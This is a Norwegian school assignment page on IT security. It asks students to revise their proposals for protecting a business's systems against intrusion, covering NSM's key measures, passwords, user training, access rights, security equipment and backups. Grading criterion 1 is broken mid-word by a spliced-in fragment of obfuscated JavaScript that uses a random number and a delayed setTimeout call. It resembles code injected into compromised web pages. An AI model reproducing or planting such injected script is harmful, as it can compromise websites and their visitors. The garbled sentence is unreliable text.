I det følgende gies en del innspill og tips til sikring av IKT-systemer mot datainnbrudd.
Din oppgave er nå å se gjennom disse innspill, og oppdatere dine forslag til sikringstiltak som du leverte på ItsLearning i post 3.5.

Alle tiltakene som beskrives her skal være med i ditt oppdaterte forslag.
Der skal du også si noe om hvordan tiltakene dine sikrer systemet, altså en begrunnelse for hvorfor tiltaket er inkludert.

 

VURDERINGSKRITERIER
Din innlevering med oppdaterte forslag til sikringstiltak vil bli vurdert. Følgende momenter vil bli vektlagt ved vurderingen:
1. Dokumentet har forside med overskrift og innledning som tydelig forteller hva det handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler om
2. Dokumentet er ryddig satt opp og lett å lese og forstå (overskrifter/tabeller/avsnitt/nummerering etc.)
3. Dokumentet inneholder flere relevante forslag til sikring av IKT-systemer mot datainnbrudd, minimum dem som er angitt på denne siden
4. For hvert av tiltakene er det gitt en begrunnelse for hvorfor det er tatt med, og/eller beskrivelse av hva tiltaket gjør eller hvordan det virker

Lykke til!

 

3.6 Innspill – tiltak mot hacking

3.6.1 NSM: Fire tiltak stopper 90% av alle dataangrep

Klikk på bildet til høyre for nærmere beskrivelse av disse tiltakene.

Inkluder disse tiltakene i ditt oppdaterte forslag til sikring av virksomhetens IKT-system.


3.6.2 Haralds påminnelse

Har Harald Eia et poeng her? Tenk gjennom på hvilken måte de ansatte kan utgjøre en sikkerhetsrisiko i virksomheten i forhold til datainnbrudd.

Ta med noen tiltak i forslaget ditt for å redusere denne risikoen, inkludert:
1. Riktig bruk av passord
2. Opplæring av brukere / nettvett
3. Administrasjon av brukerrettigheter

Du gjør oppslag på internett for evt. å samle mer informasjon om disse tiltakene, eller finne flere tiltak.

https://www.youtube.com/watch?v=QWYLPRhQVrg

3.6.3 Utstyr

Det er også mulig og nødvendig å sikre IKT systemet ved hjelp av programvare og / eller maskinvare.

Hvilket utstyr vil du foreslå at virksomheten investerer i for å sikre IKT systemet?

Klikk på bildet til høyre for en informativ artikkel om et mulig tiltak i form av utstyr/teknologi. Oppdater forslaget ditt med dette utstyret, hvis det ikke allerede er tatt med. Er det flere typer utsyr du vil ta med?


3.6.4 Hvis noe likevel går galt

Dette tiltaket vil ikke hidre datainbrudd, men være av uvurderlig betydning dersom data skulle bli mistet eller manipulert. Ethvert IKT-system må sikres på denne måten i en eller annen form.

Klikk på begge bildene til høyre, og les gjennom de to artiklene om viktig sikring av IKT systemer.

Oppdater ditt løsningsforslag med denne sikringsmetoden, du velger og begrunner selv type teknologi og øvrige detaljer.
3.6.5 Flere tips:
Tiltak mot hacking

Klikk på bildet til høyre for å se/høre en PowerPoint Mix om tiltak mot hacking

https://www.youtube.com/watch?v=cZ5M6uSgLNw